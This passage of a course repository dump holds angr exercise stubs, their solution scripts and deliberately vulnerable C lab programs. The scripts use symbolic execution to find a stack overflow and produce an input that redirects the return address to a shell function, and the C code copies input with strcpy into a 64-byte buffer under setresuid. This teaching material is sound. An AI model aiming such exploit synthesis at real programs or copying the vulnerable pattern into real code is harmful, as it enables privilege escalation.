 6 | # Make a simple security checker that checks for an overflow into the return address. There are several cases:
 7 | #
 8 | # 1. The return address is unchanged and pointing to an internal angr hook (i.e., __libc_start_main)
 9 | # 2. The return address is unchanged and pointing inside the program (normal case)
10 | # 3. The return address has been overflowed, and we can point it outside of the program (we'll check for this)
11 | # 4. The return address has been partially overflowed, and still points inside the program (future work)
12 | def state_vuln_filter(state):
13 |     # get the saved instruction pointer from the stack
14 |     pass
15 |     print "Checking saved EIP:", saved_eip
16 | 
17 |     # first, check if the return address points to a hook. If this is intact, then we assume there is no overflow
18 |     pass
19 | 
20 |     # next, create constraints representing an unsafe condition. In this case,
21 |     # let's check if the return address can point *outside* of the program.
22 |     pass
23 | 
24 |     # check if the state is satisfiable with these conditions, and return True if it is
25 |     pass
26 | 
27 | # get a new simulation manager from the project factory
28 | simgr = project.factory.simgr()
29 | 
30 | # initiate a "vuln" stash
31 | simgr.stashes['vuln'] = [ ]
32 | 
33 | # the starting state has no return address on the stack, so it will trigger our vuln filter.
34 | # We can step it until it no longer triggers the filter before starting the actual analysis.
35 | print "Initializing initial state..."
36 | while state_vuln_filter(simgr.active[0]):
37 |     simgr.step()
38 | 
39 | # Now that we are all set up, let's loop until a vulnerable state has been found
40 | print "Searching for the vulnerability!"
41 | while not simgr.vuln:
42 |     # step the simgr
43 |     pass
44 |     # after each step, move all states matching our vuln filter from the active stash to the vuln stash
45 |     pass
46 | 
47 | # now synthesize our crashing input
48 | pass
49 | open("crashing_input", "w").write(crashing_input)
50 | print "You can crash the program by doing:"
51 | print "# cat crashing_input | ./overflow"
52 | 


--------------------------------------------------------------------------------
/vuln_discovery/vuln.solution.py:
--------------------------------------------------------------------------------
 1 | import angr
 2 | 
 3 | # load the binary
 4 | project = angr.Project("overflow", load_options={ 'auto_load_libs': False })
 5 | 
 6 | # Make a simple security checker that checks for an overflow into the return address. There are several cases:
 7 | #
 8 | # 1. The return address is unchanged and pointing to an internal angr hook (i.e., __libc_start_main)
 9 | # 2. The return address is unchanged and pointing inside the program (normal case)
10 | # 3. The return address has been overflowed, and we can point it outside of the program (we'll check for this)
11 | # 4. The return address has been partially overflowed, and still points inside the program (future work)
12 | def state_vuln_filter(state):
13 |     # get the saved instruction pointer from the stack
14 |     saved_eip = state.memory.load(state.regs.ebp + 4, 4, endness="Iend_LE")
15 |     print "Checking saved EIP:", saved_eip
16 | 
17 |     # first, check if the return address points to a hook. If this is intact, then we assume there is no overflow
18 |     if project.is_hooked(state.se.any_int(saved_eip)):
19 |         return False
20 | 
21 |     # next, create constraints representing an unsafe condition. In this case,
22 |     # let's check if the return address can point *outside* of the program.
23 |     unsafe_constraints = [ state.se.Or(saved_eip < project.loader.min_addr, saved_eip > project.loader.max_addr) ]
24 | 
25 |     # check if the state is satisfiable with these conditions, and return True if it is
26 |     return state.se.satisfiable(extra_constraints=unsafe_constraints)
27 | 
28 | # get a new simulation manager from the project factory
29 | simgr = project.factory.simgr()
30 | 
31 | # initiate a "vuln" stash
32 | simgr.stashes['vuln'] = [ ]
33 | 
34 | # the starting state has no return address on the stack, so it will trigger our vuln filter.
35 | # We can step it until it no longer triggers the filter before starting the actual analysis.
36 | print "Initializing initial state..."
37 | while state_vuln_filter(simgr.active[0]):
38 |     simgr.step()
39 | 
40 | # Now that we are all set up, let's loop until a vulnerable state has been found
41 | print "Searching for the vulnerability!"
42 | while not simgr.vuln:
43 |     # step the simgr
44 |     simgr.step()
45 |     # after each step, move all states matching our vuln filter from the active stash to the vuln stash
46 |     simgr.move('active', 'vuln', filter_func=state_vuln_filter)
47 | 
48 | # now synthesize our crashing input
49 | crashing_input = simgr.vuln[0].state.posix.dumps(0)
50 | open("crashing_input", "w").write(crashing_input)
51 | print "You can crash the program by doing:"
52 | print "# cat crashing_input | ./overflow"
53 | 


--------------------------------------------------------------------------------
/vuln_discovery_2/overflow3-28d8a442fb232c0c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/vuln_discovery_2/overflow3-28d8a442fb232c0c


--------------------------------------------------------------------------------
/vuln_discovery_2/overflow3-28d8a442fb232c0c.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <string.h>
 3 | #include <unistd.h>
 4 | #include <sys/types.h>
 5 | #include "dump_stack.h"
 6 | 
 7 | /*
 8 |  * Goal: Get the program to run this function.
 9 |  */
10 | void shell(void) {
11 |     execl("/bin/sh", "sh", NULL);
12 | }
13 | 
14 | void vuln(char *str) {
15 |     char buf[64];
16 |     strcpy(buf, str);
17 |     dump_stack((void **) buf, 21, (void **) &str);
18 | }
19 | 
20 | int main(int argc, char **argv) {
21 |     if (argc != 2) {
22 |         printf("Usage: buffer_overflow [str]\n");
23 |         return 1;
24 |     }
25 | 
26 |     uid_t euid = geteuid();
27 |     setresuid(euid, euid, euid);
28 |     printf("shell function = %p\n", shell);
29 |     vuln(argv[1]);
30 |     return 0;
31 | }
32 | 


--------------------------------------------------------------------------------
/vuln_discovery_2/overflow3.py:
--------------------------------------------------------------------------------
 1 | import angr
 2 | import claripy
 3 | 
 4 | # load the binary, but the original one this time!
 5 | project = angr.Project("overflow3-28d8a442fb232c0c", load_options={ 'auto_load_libs': False })
 6 | 
 7 | # This time, we will need access to symbols (to figure out where the "shell" function is, for example).
 8 | # Let's generate a CFG to fill in the knowledgebase.
 9 | cfg = project.analyses.CFG()
10 | 
11 | # This binary has some functionality that gives angr trouble. Specifically, the way it uses printf (printing pointers)
12 | # in both main() and dump_stack() is not properly handled by angr's printf SimProcedure. If you try to run this
13 | # code without compensating for that, it will hang (because it will error on all states and keep looping while looking
14 | # for a vuln state). So, to compensate for that, we override printf and dump_stack with a simprocedure that does nothing.
15 | pass
16 | 
17 | # Make a simple security checker that checks for an overflow into the return address. There are several cases:
18 | #
19 | # 1. The return address is unchanged and pointing to an internal angr hook (i.e., __libc_start_main)
20 | # 2. The return address is unchanged and pointing inside the program (normal case)
21 | # 3. The return address has been overflowed, and we can point it outside of the program (we'll check for this)
22 | # 4. The return address has been partially overflowed, and still points inside the program (future work)
23 | def state_vuln_filter(state):
24 |     # get the saved instruction pointer from the stack
25 |     saved_eip = state.memory.load(state.regs.ebp + 4, 4, endness="Iend_LE")
26 |     print "Checking saved EIP:", saved_eip
27 | 
28 |     # first, check if the return address points to a hook. If this is intact, then we assume there is no overflow
29 |     if project.is_hooked(state.se.any_int(saved_eip)):
30 |         return False
31 | 
32 |     # next, create constraints representing an unsafe condition. In this case,
33 |     # let's check if the return address can point *outside* of the program.
34 |     unsafe_constraints = [ state.se.Or(saved_eip < project.loader.min_addr, saved_eip > project.loader.max_addr) ]
35 | 
36 |     # check if the state is satisfiable with these conditions, and return True if it is
37 |     return state.se.satisfiable(extra_constraints=unsafe_constraints)
38 | 
39 | # This time, the initialization is a bit different. The application takes a commandline argument, so we must:
40 | # first, create a symbolic bitvector representing the argument.
41 | # We're interested in the last few bytes (the part that will actually overflow the return address), so make it a
42 | # concatenation of 60 concrete bytes and 30 symbolic bytes (240 bits).
43 | arg = claripy.BVV("A"*60).concat(claripy.BVS("arg", 240))
44 | # next, create a state with this argument
45 | state = project.factory.entry_state(args=['overflow3', arg])
46 | # now, create the simulation manager with that state as the initial state
47 | simgr = project.factory.simgr(state)
48 | 
49 | # initiate a "vuln" stash
50 | simgr.stashes['vuln'] = [ ]
51 | 
52 | # Since we have the address of main in the knowledgebase, let's make a less janky initialization procedure.
53 | print "Initializing initial state..."
54 | while simgr.active[0].addr != project.kb.functions['main'].addr:
55 |     simgr.step()
56 | 
57 | # Now that we are all set up, let's loop until a vulnerable state has been found
58 | print "Searching for the vulnerability!"
59 | while not simgr.vuln:
60 |     # step the simgr
61 |     simgr.step()
62 |     # after each step, move all states matching our vuln filter from the active stash to the vuln stash
63 |     simgr.move('active', 'vuln', filter_func=state_vuln_filter)
64 | 
65 | # Now the fun part starts! Let's add a constraint that sets the overflowed return address to the "shell" function.
66 | # First, grab the stored return address in the vuln state
67 | print "Constraining saved return address!"
68 | vuln_state = simgr.vuln[0]
69 | overwritten_eip = vuln_state.memory.load(vuln_state.regs.ebp + 4, 4, endness="Iend_LE")
70 | print "Overwritten EIP:", overwritten_eip
71 | # Now, let's add a constraint to redirect that return address to the shell function
72 | addr_of_shell = project.kb.functions['shell'].addr
73 | vuln_state.add_constraints(overwritten_eip == addr_of_shell)
74 | 
75 | # and now let's explore the vuln stash until we reach the shell
76 | print "Exploring to 'shell' function."
77 | simgr.explore(stash='vuln', find=addr_of_shell)
78 | 
79 | # now synthesize our pwning input!
80 | pwning_input = simgr.found[0].state.se.any_str(arg)
81 | open("pwning_input", "w").write(pwning_input.split('\0')[0]) # since it's a string arg, we only care up to the first null byte
82 | print "You can crash the program by doing:"
83 | print '# ./overflow3-28d8a442fb232c0c "$(cat pwning_input)"'
84 | 


--------------------------------------------------------------------------------
/vuln_discovery_2/overflow3.solution.py:
--------------------------------------------------------------------------------
 1 | import angr
 2 | import claripy
 3 | 
 4 | # load the binary, but the original one this time!
 5 | project = angr.Project("overflow3-28d8a442fb232c0c", load_options={ 'auto_load_libs': False })
 6 | 
 7 | # This time, we will need access to symbols (to figure out where the "shell" function is, for example).
 8 | # Let's generate a CFG to fill in the knowledgebase.
 9 | cfg = project.analyses.CFG()
10 | 
11 | # This binary has some functionality that gives angr trouble. Specifically, the way it uses printf (printing pointers)
12 | # in both main() and dump_stack() is not properly handled by angr's printf SimProcedure. If you try to run this
13 | # code without compensating for that, it will hang (because it will error on all states and keep looping while looking
14 | # for a vuln state). So, to compensate for that, we override printf and dump_stack with a simprocedure that does nothing.
15 | class DoNothing(angr.SimProcedure):
16 |     def run(self):
17 |         return
18 | 
19 | project.hook(project.kb.functions['printf'].addr, DoNothing)
20 | project.hook(project.kb.functions['dump_stack'].addr, DoNothing)
21 | 
22 | # Make a simple security checker that checks for an overflow into the return address. There are several cases:
23 | #
24 | # 1. The return address is unchanged and pointing to an internal angr hook (i.e., __libc_start_main)
25 | # 2. The return address is unchanged and pointing inside the program (normal case)
26 | # 3. The return address has been overflowed, and we can point it outside of the program (we'll check for this)
27 | # 4. The return address has been partially overflowed, and still points inside the program (future work)
28 | def state_vuln_filter(state):
29 |     # get the saved instruction pointer from the stack
30 |     saved_eip = state.memory.load(state.regs.ebp + 4, 4, endness="Iend_LE")
31 |     print "Checking saved EIP:", saved_eip
32 | 
33 |     # first, check if the return address points to a hook. If this is intact, then we assume there is no overflow
34 |     if project.is_hooked(state.se.any_int(saved_eip)):
35 |         return False
36 | 
37 |     # next, create constraints representing an unsafe condition. In this case,
38 |     # let's check if the return address can point *outside* of the program.
39 |     unsafe_constraints = [ state.se.Or(saved_eip < project.loader.min_addr, saved_eip > project.loader.max_addr) ]
40 | 
41 |     # check if the state is satisfiable with these conditions, and return True if it is
42 |     return state.se.satisfiable(extra_constraints=unsafe_constraints)
43 | 
44 | # This time, the initialization is a bit different. The application takes a commandline argument, so we must:
45 | # first, create a symbolic bitvector representing the argument.
46 | # We're interested in the last few bytes (the part that will actually overflow the return address), so make it a
47 | # concatenation of 60 concrete bytes and 30 symbolic bytes (240 bits).
48 | arg = claripy.BVV("A"*60).concat(claripy.BVS("arg", 240))
49 | # next, create a state with this argument
50 | state = project.factory.entry_state(args=['overflow3', arg])
51 | # now, create the simulation manager with that state as the initial state
52 | simgr = project.factory.simgr(state)
53 | 
54 | # initiate a "vuln" stash
55 | simgr.stashes['vuln'] = [ ]
56 | 
57 | # Since we have the address of main in the knowledgebase, let's make a less janky initialization procedure.
58 | print "Initializing initial state..."
59 | while simgr.active[0].addr != project.kb.functions['main'].addr:
60 |     simgr.step()
61 | 
62 | # Now that we are all set up, let's loop until a vulnerable state has been found
63 | print "Searching for the vulnerability!"
64 | while not simgr.vuln:
65 |     # step the simgr
66 |     simgr.step()
67 |     # after each step, move all states matching our vuln filter from the active stash to the vuln stash
68 |     simgr.move('active', 'vuln', filter_func=state_vuln_filter)
69 | 
70 | # Now the fun part starts! Let's add a constraint that sets the overflowed return address to the "shell" function.
71 | # First, grab the stored return address in the vuln state
72 | print "Constraining saved return address!"
73 | vuln_state = simgr.vuln[0]
74 | overwritten_eip = vuln_state.memory.load(vuln_state.regs.ebp + 4, 4, endness="Iend_LE")
75 | print "Overwritten EIP:", overwritten_eip
76 | # Now, let's add a constraint to redirect that return address to the shell function
77 | addr_of_shell = project.kb.functions['shell'].addr
78 | vuln_state.add_constraints(overwritten_eip == addr_of_shell)
79 | 
80 | # and now let's explore the vuln stash until we reach the shell
81 | print "Exploring to 'shell' function."
82 | simgr.explore(stash='vuln', find=addr_of_shell)
83 | 
84 | # now synthesize our pwning input!
85 | pwning_input = simgr.found[0].state.se.any_str(arg)
86 | open("pwning_input", "w").write(pwning_input.split('\0')[0]) # since it's a string arg, we only care up to the first null byte
87 | print "You can crash the program by doing:"
88 | print '# ./overflow3-28d8a442fb232c0c "$(cat pwning_input)"'
89 | 


--------------------------------------------------------------------------------
/vuln_discovery_simple/overflow3-simplified:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/vuln_discovery_simple/overflow3-simplified


--------------------------------------------------------------------------------
/vuln_discovery_simple/overflow3-simplified.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <string.h>
 3 | #include <unistd.h>
 4 | #include <sys/types.h>
 5 | //#include "dump_stack.h"
 6 | 
 7 | /*
 8 |  * Goal: Get the program to run this function.
 9 |  */
10 | void shell(void) {
11 |     execl("/bin/sh", "sh", NULL);
12 | }
13 | 
14 | void vuln(char *str) {
15 |     char buf[64];
16 |     strcpy(buf, str);
17 |     //dump_stack((void **) buf, 21, (void **) &str);
18 | }
19 | 
20 | int main(int argc, char **argv) {
21 |     if (argc != 2) {
22 |         printf("Usage: buffer_overflow [str]\n");
23 |         return 1;
24 |     }
25 | 
26 |     //uid_t euid = geteuid();
27 |     //setresuid(euid, euid, euid);
28 |     //printf("shell function = %p\n", shell);
29 |     vuln(argv[1]);
30 |     return 0;
31 | }
32 | 


--------------------------------------------------------------------------------
/vuln_discovery_simple/overflow3.py:
--------------------------------------------------------------------------------
 1 | import angr
 2 | import claripy
 3 | 
 4 | # load the binary
 5 | project = angr.Project("overflow3-simplified", load_options={ 'auto_load_libs': False })
 6 | 
 7 | # This time, we will need access to symbols (to figure out where the "shell" function is, for example).
 8 | # Let's generate a CFG to fill in the knowledgebase.
 9 | pass
10 | 
11 | # Make a simple security checker that checks for an overflow into the return address. There are several cases:
12 | #
13 | # 1. The return address is unchanged and pointing to an internal angr hook (i.e., __libc_start_main)
14 | # 2. The return address is unchanged and pointing inside the program (normal case)
15 | # 3. The return address has been overflowed, and we can point it outside of the program (we'll check for this)
16 | # 4. The return address has been partially overflowed, and still points inside the program (future work)
17 | def state_vuln_filter(state):
18 |     # get the saved instruction pointer from the stack
19 |     saved_eip = state.memory.load(state.regs.ebp + 4, 4, endness="Iend_LE")
20 |     print "Checking saved EIP:", saved_eip
21 | 
22 |     # first, check if the return address points to a hook. If this is intact, then we assume there is no overflow
23 |     if project.is_hooked(state.se.any_int(saved_eip)):
24 |         return False
25 | 
26 |     # next, create constraints representing an unsafe condition. In this case,
27 |     # let's check if the return address can point *outside* of the program.
28 |     unsafe_constraints = [ state.se.Or(saved_eip < project.loader.min_addr, saved_eip > project.loader.max_addr) ]
29 | 
30 |     # check if the state is satisfiable with these conditions, and return True if it is
31 |     return state.se.satisfiable(extra_constraints=unsafe_constraints)
32 | 
33 | # This time, the initialization is a bit different. The application takes a commandline argument, so we must:
34 | # first, create a symbolic bitvector representing the argument.
35 | # We're interested in the last few bytes (the part that will actually overflow the return address), so make it a
36 | # concatenation of 60 concrete bytes and 30 symbolic bytes (240 bits).
37 | pass
38 | # next, create a state with this argument
39 | pass
40 | # now, create the simulation manager with that state as the initial state
41 | simgr = project.factory.simgr(state)
42 | 
43 | # initiate a "vuln" stash
44 | simgr.stashes['vuln'] = [ ]
45 | 
46 | # Since we have the address of main in the knowledgebase, let's make a less janky initialization procedure.
47 | print "Initializing initial state..."
48 | while simgr.active[0].addr != project.kb.functions['main'].addr:
49 |     simgr.step()
50 | 
51 | # Now that we are all set up, let's loop until a vulnerable state has been found
52 | print "Searching for the vulnerability!"
53 | while not simgr.vuln:
54 |     # step the simgr
55 |     simgr.step()
56 |     # after each step, move all states matching our vuln filter from the active stash to the vuln stash
57 |     simgr.move('active', 'vuln', filter_func=state_vuln_filter)
58 | 
59 | # Now the fun part starts! Let's add a constraint that sets the overflowed return address to the "shell" function.
60 | # First, grab the stored return address in the vuln state
61 | print "Constraining saved return address!"
62 | vuln_state = simgr.vuln[0]
63 | pass
64 | print "Overwritten EIP:", overwritten_eip
65 | # Now, let's add a constraint to redirect that return address to the shell function
66 | addr_of_shell = project.kb.functions['shell'].addr
67 | pass
68 | 
69 | # and now let's explore the vuln stash until we reach the shell
70 | print "Exploring to 'shell' function."
71 | pass
72 | 
73 | # now synthesize our pwning input!
74 | pass
75 | open("pwning_input", "w").write(pwning_input.split('\0')[0]) # since it's a string arg, we only care up to the first null byte
76 | print "You can crash the program by doing:"
77 | print '# ./overflow3-simplified "$(cat pwning_input)"'
78 | 


--------------------------------------------------------------------------------
/vuln_discovery_simple/overflow3.solution.py:
--------------------------------------------------------------------------------
 1 | import angr
 2 | import claripy
 3 | 
 4 | # load the binary
 5 | project = angr.Project("overflow3-simplified", load_options={ 'auto_load_libs': False })
 6 | 
 7 | # This time, we will need access to symbols (to figure out where the "shell" function is, for example).
 8 | # Let's generate a CFG to fill in the knowledgebase.
 9 | cfg = project.analyses.CFG()
10 | 
11 | # Make a simple security checker that checks for an overflow into the return address. There are several cases:
12 | #
13 | # 1. The return address is unchanged and pointing to an internal angr hook (i.e., __libc_start_main)
14 | # 2. The return address is unchanged and pointing inside the program (normal case)
15 | # 3. The return address has been overflowed, and we can point it outside of the program (we'll check for this)
16 | # 4. The return address has been partially overflowed, and still points inside the program (future work)
17 | def state_vuln_filter(state):
18 |     # get the saved instruction pointer from the stack
19 |     saved_eip = state.memory.load(state.regs.ebp + 4, 4, endness="Iend_LE")
20 |     print "Checking saved EIP:", saved_eip
21 | 
22 |     # first, check if the return address points to a hook. If this is intact, then we assume there is no overflow
23 |     if project.is_hooked(state.se.any_int(saved_eip)):
24 |         return False
25 | 
26 |     # next, create constraints representing an unsafe condition. In this case,
27 |     # let's check if the return address can point *outside* of the program.
28 |     unsafe_constraints = [ state.se.Or(saved_eip < project.loader.min_addr, saved_eip > project.loader.max_addr) ]
29 | 
30 |     # check if the state is satisfiable with these conditions, and return True if it is
31 |     return state.se.satisfiable(extra_constraints=unsafe_constraints)
32 | 
33 | # This time, the initialization is a bit different. The application takes a commandline argument, so we must:
34 | # first, create a symbolic bitvector representing the argument.
35 | # We're interested in the last few bytes (the part that will actually overflow the return address), so make it a
36 | # concatenation of 60 concrete bytes and 30 symbolic bytes (240 bits).
37 | arg = claripy.BVV("A"*60).concat(claripy.BVS("arg", 240))
38 | # next, create a state with this argument
39 | state = project.factory.entry_state(args=['overflow3', arg])
40 | # now, create the simulation manager with that state as the initial state
41 | simgr = project.factory.simgr(state)
42 | 
43 | # initiate a "vuln" stash
44 | simgr.stashes['vuln'] = [ ]
45 | 
46 | # Since we have the address of main in the knowledgebase, let's make a less janky initialization procedure.
47 | print "Initializing initial state..."
48 | while simgr.active[0].addr != project.kb.functions['main'].addr:
49 |     simgr.step()
50 | 
51 | # Now that we are all set up, let's loop until a vulnerable state has been found
52 | print "Searching for the vulnerability!"
53 | while not simgr.vuln:
54 |     # step the simgr
55 |     simgr.step()
56 |     # after each step, move all states matching our vuln filter from the active stash to the vuln stash
57 |     simgr.move('active', 'vuln', filter_func=state_vuln_filter)
58 | 
59 | # Now the fun part starts! Let's add a constraint that sets the overflowed return address to the "shell" function.
60 | # First, grab the stored return address in the vuln state
61 | print "Constraining saved return address!"
62 | vuln_state = simgr.vuln[0]
63 | overwritten_eip = vuln_state.memory.load(vuln_state.regs.ebp + 4, 4, endness="Iend_LE")
64 | print "Overwritten EIP:", overwritten_eip
65 | # Now, let's add a constraint to redirect that return address to the shell function
66 | addr_of_shell = project.kb.functions['shell'].addr
67 | vuln_state.add_constraints(overwritten_eip == addr_of_shell)
68 | 
69 | # and now let's explore the vuln stash until we reach the shell
70 | print "Exploring to 'shell' function."
71 | simgr.explore(stash='vuln', find=addr_of_shell)
72 | 
73 | # now synthesize our pwning input!
74 | pwning_input = simgr.found[0].se.any_str(arg)
75 | open("pwning_input", "w").write(pwning_input.split('\0')[0]) # since it's a string arg, we only care up to the first null byte
76 | print "You can crash the program by doing:"
77 | print '# ./overflow3-simplified "$(cat pwning_input)"'
78 | 


--------------------------------------------------------------------------------